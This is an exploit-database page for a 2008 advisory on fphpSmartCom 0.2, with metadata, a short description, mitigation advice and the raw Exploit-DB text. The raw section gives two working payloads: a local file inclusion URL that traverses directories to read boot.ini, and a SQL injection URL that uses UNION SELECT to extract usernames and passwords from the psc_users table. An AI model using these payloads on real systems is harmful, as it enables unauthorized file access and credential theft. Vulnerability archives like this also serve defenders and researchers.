header-logo
Suggest Exploit
vendor:
fphpSmartCom
by:
Neo, R3dm0v3
7.5
CVSS
HIGH
Local File Inclusion, SQL Injection
94, 89
CWE
Product Name: fphpSmartCom
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: phpsmartcom
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

fphpSmartCom v. 0.2 Local File Inclusion , SQL Injection Vuln

fphpSmartCom v. 0.2 is vulnerable to Local File Inclusion and SQL Injection. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious code to the vulnerable application. This can allow the attacker to gain access to sensitive information or execute arbitrary code on the server.

Mitigation:

To mitigate Local File Inclusion and SQL Injection vulnerabilities, input validation should be performed on all user-supplied data. Additionally, the application should be configured to use least privilege when accessing resources.
Source

Exploit-DB raw data:

 fphpSmartCom v. 0.2 Local File Inclusion , SQL Injection Vuln
 
Download : http://sourceforge.net/projects/phpsmartcom/
 
Local File Inclusion:
http://127.0.0.1/phpsmartcom/index.php?p=../../../../../boot.ini%00
 
SQL Injection:
http://localhost/phpsmartcom/index.php?p=viewprofile&uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+where+uid=1+limit+1,1/*
 
Credits : Neo , R3dm0v3

# milw0rm.com [2008-09-13]